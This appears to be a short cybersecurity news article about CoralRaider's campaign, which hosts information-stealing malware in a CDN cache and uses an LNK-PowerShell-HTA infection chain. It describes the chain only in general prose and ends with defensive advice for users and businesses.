Cybersecurity researchers have discovered a campaign by the hacker group CoralRaider that leverages a novel method to deliver information-stealing malware. The attacks target computer systems in the United States, United Kingdom, Germany, and Japan.
Traditionally, cybercriminals use malicious links or infected attachments to deliver malware. In this instance, CoralRaider is exploiting a content delivery network (CDN) cache to store the malware. CDNs are essentially networks of servers distributed across the globe that store website content. They play a crucial role in ensuring fast loading times for users by delivering content from the closest server.
In this campaign, CoralRaider uploads the information-stealing malware to a compromised website hosted on the Bynny CDN platform. The malware then resides within the CDN cache, allowing the attackers to use legitimate CDN infrastructure for malicious purposes. This technique offers CoralRaider several advantages. By storing the malware on a CDN server, the attackers can bypass security measures that typically target suspicious downloads from unknown sources. Additionally, leveraging the geographically distributed nature of CDNs allows for faster distribution of the malware to victims worldwide, minimizing download times.
The attacks begin with victims opening an archive containing a malicious Windows shortcut file (LNK). When the LNK file is executed, it triggers PowerShell commands that download a heavily obfuscated HTML application (HTA) file from a subdomain on the compromised Bynny CDN server. The HTA file contains JavaScript code that retrieves and executes a PowerShell script responsible for decrypting the actual malware payload. This multi-layered approach makes it more difficult for security software to detect the malicious activity.
The ultimate objective of the CoralRaider campaign is to deploy information-stealing malware. Once installed on a victim's machine, this malware can steal sensitive information such as login credentials, financial data, and social media account details. This stolen information can then be used for various fraudulent activities, including identity theft and financial scams.
Security researchers recommend that users exercise caution when opening email attachments, even from seemingly known senders. It's crucial to only download files from trusted sources. Businesses should ensure they have robust security measures in place, including advanced endpoint detection and response (EDR) solutions capable of identifying and blocking malware downloads. Additionally, staying updated on the latest cyber threats and implementing security best practices can significantly reduce the risk of falling victim to such attacks.